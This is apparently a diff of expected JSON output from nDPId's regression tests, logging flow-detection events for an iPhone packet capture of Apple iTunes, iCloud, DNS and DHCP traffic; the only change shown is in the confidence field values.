
-00955{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":364,"source":"iphone.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454599934,"flow_last_seen":1582454600116,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454600116,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"92.123.77.26","src_port":50587,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.3","client_requested_server_name":"play.itunes.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00914{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":352,"source":"iphone.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454599934,"flow_last_seen":1582454600080,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454600080,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"92.123.77.26","src_port":50587,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"play.itunes.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00955{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":364,"source":"iphone.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454599934,"flow_last_seen":1582454600116,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454600116,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"92.123.77.26","src_port":50587,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.3","client_requested_server_name":"play.itunes.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":419,"source":"iphone.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454600454,"flow_last_seen":1582454600454,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1582454600454,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63677,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":419,"source":"iphone.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1582454600454,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1582454600454,"pkt":"xiwDYGpkxGGLNYKpCABFAABDtJ8AAP8RgafAqAIRwKgCAfi9ADUAL+BtI4YBAAABAAAAAAAABHN5bmMGaXR1bmVzBWFwcGxlA2NvbQAAAQAB"} -00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":419,"source":"iphone.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454600454,"flow_last_seen":1582454600454,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1582454600454,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63677,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"},"dns": {"query":"sync.itunes.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":419,"source":"iphone.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454600454,"flow_last_seen":1582454600454,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1582454600454,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63677,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"},"dns": 
{"query":"sync.itunes.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00676{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":422,"source":"iphone.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1582454600494,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":222,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":222,"pkt_l4_len":188,"thread_ts_msec":1582454600494,"pkt":"xGGLNYKpxiwDYGpkCABFAADQcdgAAEARguLAqAIBwKgCEQA1+L0AvB7yI4aBgAABAAQAAAAABHN5bmMGaXR1bmVzBWFwcGxlA2NvbQAAAQABwAwABQABAAAF1gAmCHN5bmMtY2RuDGl0dW5lcy1hcHBsZQNjb20GYWthZG5zA25ldADAMwAFAAEAAAWqABsGaXR1bmVzBWFwcGxlA2NvbQdlZGdla2V5wFTAZQAFAAEAABGWABgEZTY3MwVkc2NlOQpha2FtYWllZGdlwFTAjAABAAEAAAAYAARfZRg1"} -00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":422,"source":"iphone.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454600454,"flow_last_seen":1582454600494,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":219,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1582454600494,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63677,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"},"dns": {"query":"sync.itunes.apple.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"95.101.24.53"}} 
+00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":422,"source":"iphone.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454600454,"flow_last_seen":1582454600494,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":219,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1582454600494,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63677,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"},"dns": {"query":"sync.itunes.apple.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"95.101.24.53"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":424,"source":"iphone.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454600508,"flow_last_seen":1582454600508,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454600508,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"95.101.24.53","src_port":50588,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":424,"source":"iphone.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1582454600508,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454600508,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGAGXAqAIRX2UYNcWcAbsi3fgeAAAAALDC\/\/8YLgAAAgQFtAEDAwcBAQgKEd\/vhgAAAAAEAgAA"} 
00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":425,"source":"iphone.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1582454600541,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454600541,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADUGS2lfZRg1wKgCEQG7xZzFmLU\/It34H6BScSB2MAAAAgQFrAQCCAqI0z6tEd\/vhgEDAwc="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":426,"source":"iphone.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":1582454600545,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454600545,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGAHHAqAIRX2UYNcWcAbsi3fgfxZi1QIAQBAsSJAAAAQEIChHf76yI0z6t"} -00914{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":427,"source":"iphone.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454600508,"flow_last_seen":1582454600545,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454600545,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"95.101.24.53","src_port":50588,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"sync.itunes.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00955{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":432,"source":"iphone.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454600508,"flow_last_seen":1582454600580,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454600580,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"95.101.24.53","src_port":50588,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.3","client_requested_server_name":"sync.itunes.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1582454598252,"flow_last_seen":1582454599058,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":12558,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.140","src_port":50575,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"}} 
-00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":45,"flow_first_seen":1582454598587,"flow_last_seen":1582454600617,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":10875,"flow_avg_l4_payload_len":241,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50580,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"}} -00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":77,"flow_first_seen":1582454598721,"flow_last_seen":1582454600748,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":73228,"flow_avg_l4_payload_len":951,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.87","src_port":50581,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1582454599225,"flow_last_seen":1582454600287,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7909,"flow_avg_l4_payload_len":247,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50584,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1582454599740,"flow_last_seen":1582454600279,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7913,"flow_avg_l4_payload_len":263,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50586,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598542,"flow_last_seen":1582454598582,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":202,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":52852,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"}} 
-00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598205,"flow_last_seen":1582454598247,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63143,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"}} -00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1582454553219,"flow_last_seen":1582454596366,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":2100,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} +00914{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":427,"source":"iphone.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454600508,"flow_last_seen":1582454600545,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454600545,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"95.101.24.53","src_port":50588,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"sync.itunes.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00955{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":432,"source":"iphone.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454600508,"flow_last_seen":1582454600580,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454600580,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"95.101.24.53","src_port":50588,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.3","client_requested_server_name":"sync.itunes.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1582454598252,"flow_last_seen":1582454599058,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":12558,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.140","src_port":50575,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"}} +00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":45,"flow_first_seen":1582454598587,"flow_last_seen":1582454600617,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":10875,"flow_avg_l4_payload_len":241,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50580,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"}} +00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":77,"flow_first_seen":1582454598721,"flow_last_seen":1582454600748,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":73228,"flow_avg_l4_payload_len":951,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.87","src_port":50581,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"}} 
+00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1582454599225,"flow_last_seen":1582454600287,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7909,"flow_avg_l4_payload_len":247,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50584,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1582454599740,"flow_last_seen":1582454600279,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7913,"flow_avg_l4_payload_len":263,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50586,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598542,"flow_last_seen":1582454598582,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":202,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":52852,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598205,"flow_last_seen":1582454598247,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63143,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"}} +00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1582454553219,"flow_last_seen":1582454596366,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":2100,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} 
00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454595839,"flow_last_seen":1582454599396,"flow_idle_time":200000,"flow_min_l4_payload_len":66,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":264,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip6","src_ip":"fe80::823:3f17:8298:a29c","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1582454585625,"flow_last_seen":1582454585625,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"239.255.255.250","src_port":51411,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598246,"flow_last_seen":1582454598287,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":51007,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"ConnCheck"}} 
